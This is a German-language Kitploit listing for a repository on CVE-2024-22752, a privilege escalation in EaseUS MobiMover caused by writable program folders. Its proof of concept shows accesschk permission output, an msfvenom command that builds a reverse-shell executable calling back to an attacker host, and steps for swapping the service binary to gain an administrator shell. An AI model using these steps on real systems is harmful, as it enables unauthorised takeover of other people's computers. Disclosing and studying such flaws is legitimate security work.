Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-22752 — EaseUS MobiMover 6.0.5 Build 21620 - Unsichere Datei- und Ordnerberechtigungen | Kitploit
Tools/GitHubGitHub/hacker625/cve-2024-22752
Privilege EscalationSchwachstellenanalyseExploitationFehlkonfigurationBinary-Exploitation
GitHubhacker625/cve-2024-22752

CVE-2024-22752

EaseUS MobiMover 6.0.5 Build 21620 - Unsichere Datei- und Ordnerberechtigungen

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

EaseUS MobiMover 6.0.5 Build 21620 – Unsichere Datei- und Ordnerberechtigungen

MobiMoverUILaunch.exe leidet unter einer Schwachstelle zur Erhöhung von Berechtigungen, die von einem "Authentifizierten Benutzer" genutzt werden kann, um die ausführbare Datei des Dienstes durch eine Binärdatei seiner Wahl im bin-Ordner zu ersetzen. Die Schwachstelle besteht aufgrund schwacher Berechtigungen, die der "Gruppe authentifizierter Benutzer" gewährt werden, was die (M)-Flagge, auch bekannt als "Modify Privilege", verleiht.

alt text

Hersteller-Webseite: https://www.easeus.com/
Software-Link: https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
POC-Video: https://www.youtube.com/watch?v=FR4cQm-z4Gw

#PoC

root@kitploit:~
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
        FILE_ALL_ACCESS
  RW NT SERVICE\TrustedInstaller
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  1. Erstellen Sie eine schädliche Binärdatei auf Kali Linux mit msfvenom
    msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe

  2. Übertragen Sie die erstellte 'prepare.exe' als Benutzer mit niedrigen Berechtigungen vom Kali auf den Windows-Host

  3. Verschieben Sie die erstellte Binärdatei 'prepare.exe' in das Verzeichnis 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe', um die alte Datei als Benutzer mit niedrigen Berechtigungen zu ersetzen

  4. Wenn der Administrator die Anwendung ausführt, erhalten Sie eine Reverse-Shell als Administrator

Tool herunterladen